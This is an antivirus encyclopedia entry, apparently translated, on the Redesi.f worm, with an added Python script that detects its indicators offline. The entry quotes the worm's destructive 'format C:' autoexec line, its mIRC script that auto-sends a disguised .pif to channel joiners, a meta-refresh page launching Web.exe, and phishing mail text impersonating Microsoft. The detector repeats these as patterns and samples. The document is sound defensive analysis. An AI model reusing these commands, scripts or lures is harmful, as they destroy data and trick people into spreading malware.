Virus name (Chinese):
红丝带变种F (Red Ribbon variant F)
Aliases:
I-Worm.Redesi.f [AVP], I-Worm/Redesi.f [KV], Worm.Re
Threat level:
★★☆☆☆
Virus type:
Worm
Virus length:
11776
Affected systems:
Win9x, WinNT
Virus behaviour:
This is a worm that spreads via e-mail and mIRC. When it runs, it displays a message box claiming that a Windows update has completed successfully in order to fool the user, copies itself five times into the root of drive C, and adds a Run entry to the registry so that it starts automatically at boot. It also writes two batch commands into C:\autoexec.bat: one displays "With a fool no season spend, or be counted as his freind." and the other formats drive C. By modifying mIRC's script configuration file it hooks mIRC to the worm file, giving it an additional propagation path. It also creates an HTML file, C:\inetpub\wwwroot\default.htm, which launches the worm file when the page is opened. Finally, the worm harvests e-mail addresses from the Outlook Express address book and mails itself out as an attachment in Microsoft's name; the message is highly convincing, so users are likely to be fooled into opening the attachment and becoming infected.
1) Creates several copies of the worm in the root of drive C (all as hidden files):
C:\Commond.exe
C:\MAPI.exe
C:\Sysupdate.exe
C:\UserConfig.exe
C:\disksync.exe
2) Adds a Run entry in the registry so that the worm starts automatically:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"Desire"="C:\commond.exe"
Under HKEY_LOCAL_MACHINE\Software\Microsoft it adds the value:
"Desire"="Done"
3) Writes the following lines to C:\autoexec.bat:
ECHO With a fool no season spend, or be counted as his freind.
format C: /autotest
4) Writes the following to C:\mirc\script.ini:
[script]
n0=on 1:JOIN:#:{
n1=.msg $nick Dear User. Please apply this patch that will protect you from UDP flooding. If you are running a Linux IRC client this update is not needed due to kernel filtering. Regards. Dalnet/Undernet staff.
n2=.copy C:\MAPI.exe C:\mirc\IRCUpdate.IRC.pif
n3=.dcc send $nick C:\mirc\IRCUpdate.IRC.pif
n4=}
5) Creates the file:
C:\inetpub\wwwroot\Web.exe
and generates a web page that points to it:
C:\inetpub\wwwroot\default.htm
The page contains:
<META http-equiv="refresh" content="0;url=Web.exe">
<A href="./Web.exe">
<h3>
We Are Forever
</h3>
</A>
6) Uses one of the following lines as the mail subject:
FW: Windows at Risk.
FW: Buffer overflow could cause IT meltdown.
FW: Insufficient bounds chcecking cause buffer overrun.
FW: Executable stack could cost IT sector millions.
FW: Invalid instruction causes AX and BX registers to differ.
FW: Terrorists release computer virus.
FW: Microsoft and C.E.R.T Corobaration
FW: Stack overrun can cause data loss on first bootable disk
FW: Microsoft Update. Final Release Candidate.
FW: Redesi worm. MAPI update..
7) Mail body:
Hey. Sorry I've not emailed you for a while... well I am now.
Just letting you know I'll be sending an attachment in my next email, so you don't have to worry. I know you can't be too carefull with these virii around, but this is OK.
Speak to you later.
Hey
Well, here is the email I told you I was going to send.
I'll speak to you more later. The boss is comming.
-----Original Message-----
From: Microsoft Security List [mailto:security@microsoft.com]
Sent: 25 October 2001 12:03
Subject: Buffer overflow
Dear Subscriber
Due to insufficient bounds checking in the Windows Messaging API
any value stores in the AX and BX registers (and their register halves
any XOR (compare) operation against these to registers or the handl register halfs
will always return and value of 1, causing the JNE instruction to execute.
We consider this a HIGH RISK vulnerability, and any computer hacker having any
knowledge of the assembly language could write a working egg to exploit this flaw.
It is highly advised that you install the attached MAPI update to stop any subsequent security breach.
Regards
Microsoft Support
8) Uses one of the following names for the attachment:
Commond.exe
MAPI.exe
Sysupdate.exe
UserConfig.exe
disksync.exe
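The artifacts listed in steps 1 through 8 above are all things a responder can check for without running anything from the suspect machine. The following is an added example (not part of this entry and not a vendor tool) that turns them into offline checks: it takes the contents of autoexec.bat, script.ini and default.htm as strings, the Run key's values as a dictionary and the root-directory listing as a list of names, and reports which of the entry's indicators are present. Function names, the message strings and the sample inputs at the bottom are all constructed for this example, modelled on the text of the entry.

```python
"""Offline indicator check for the host and mail artifacts this entry lists
for Redesi.f.

Added example, not part of the original entry or any vendor tool. Every
input is a plain string, dict or list, so copies of autoexec.bat,
script.ini and default.htm pulled from a suspect machine (or an exported
registry value) can be checked anywhere. The sample inputs at the bottom
are constructed for demonstration from the text of the entry.
"""
import re

# Dropped copies listed in the entry (root of C:, hidden). Windows file
# names are case-insensitive, so everything is compared in lower case.
DROPPED_COPIES = {"commond.exe", "mapi.exe", "sysupdate.exe",
                  "userconfig.exe", "disksync.exe"}

# Subject lines the entry says the worm picks from (spelling as in the entry).
SUBJECTS = {
    "FW: Windows at Risk.",
    "FW: Buffer overflow could cause IT meltdown.",
    "FW: Insufficient bounds chcecking cause buffer overrun.",
    "FW: Executable stack could cost IT sector millions.",
    "FW: Invalid instruction causes AX and BX registers to differ.",
    "FW: Terrorists release computer virus.",
    "FW: Microsoft and C.E.R.T Corobaration",
    "FW: Stack overrun can cause data loss on first bootable disk",
    "FW: Microsoft Update. Final Release Candidate.",
    "FW: Redesi worm. MAPI update..",
}


def check_run_key(values):
    """values: {name: data} exported from HKLM\\...\\CurrentVersion\\Run.
    Flags the 'Desire' value pointing at commond.exe that the entry describes."""
    data = values.get("Desire", "")
    if data.lower().rstrip('"').endswith("commond.exe"):
        return ["Run value Desire -> %s" % data]
    return []


def check_autoexec(text):
    """Flags the two batch lines the worm appends to C:\\autoexec.bat."""
    hits = []
    for line in text.splitlines():
        low = line.strip().lower()
        if re.match(r"format\s+c:", low):
            hits.append("autoexec.bat formats C: -> %s" % line.strip())
        if "with a fool no season spend" in low:
            hits.append("autoexec.bat taunt line -> %s" % line.strip())
    return hits


def check_mirc_script(text):
    """Flags a script.ini on-JOIN handler that DCC-sends a .pif to every
    joiner, which is the mIRC hook the entry describes."""
    low = text.lower()
    hits = []
    if re.search(r"on\s*1:join:", low) and \
            re.search(r"\.dcc\s*send\s+\$nick.*\.pif", low):
        hits.append("script.ini auto-DCC of .pif on JOIN")
    if "ircupdate.irc.pif" in low:
        hits.append("script.ini references IRCUpdate.IRC.pif")
    return hits


def check_default_htm(text):
    """Flags the meta-refresh and link to Web.exe the worm writes."""
    low = text.lower()
    hits = []
    if re.search(r'http-equiv="refresh"\s+content="0;\s*url=web\.exe"', low):
        hits.append("default.htm meta-refresh to Web.exe")
    if re.search(r'href="\./?web\.exe"', low):
        hits.append("default.htm link to Web.exe")
    return hits


def check_root_listing(names):
    """names: file names from the root of C:; returns the dropped copies present."""
    return sorted(n for n in names if n.lower() in DROPPED_COPIES)


def is_worm_subject(subject):
    """True if a mail subject is one of the lines the entry lists."""
    return subject.strip() in SUBJECTS


def scan(run_values, autoexec, script_ini, default_htm, root_names):
    """Runs every host check and returns the combined list of findings."""
    return (check_run_key(run_values) + check_autoexec(autoexec)
            + check_mirc_script(script_ini) + check_default_htm(default_htm)
            + ["dropped copy present: %s" % n
               for n in check_root_listing(root_names)])


# --- constructed sample inputs, modelled on the entry's text ---
SAMPLE_RUN = {"Desire": "C:\\commond.exe", "SystemTray": "SysTray.Exe"}
SAMPLE_AUTOEXEC = (
    "@ECHO OFF\r\nPATH C:\\WINDOWS;C:\\WINDOWS\\COMMAND\r\n"
    "ECHO With a fool no season spend, or be counted as his freind.\r\n"
    "format C: /autotest\r\n"
)
SAMPLE_SCRIPT_INI = r"""[script]
n0=on 1:JOIN:#:{
n1=.msg $nick Dear User. Please apply this patch.
n2=.copy C:\MAPI.exe C:\mirc\IRCUpdate.IRC.pif
n3=.dcc send $nick C:\mirc\IRCUpdate.IRC.pif
n4=}
"""
SAMPLE_HTM = ('<META http-equiv="refresh" content="0;url=Web.exe">\n'
              '<A href="./Web.exe"><h3>We Are Forever</h3></A>\n')
SAMPLE_ROOT = ["AUTOEXEC.BAT", "Commond.exe", "disksync.exe", "IO.SYS", "mapi.exe"]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RUN, SAMPLE_AUTOEXEC, SAMPLE_SCRIPT_INI,
                        SAMPLE_HTM, SAMPLE_ROOT):
        print(finding)
```

The checks deliberately match on behaviour rather than exact bytes: any on-JOIN handler that DCC-sends a .pif is flagged even if the message text differs, and any `format c:` line in autoexec.bat is reported regardless of the switches used, so the same script still catches trivial edits of the worm's dropped files.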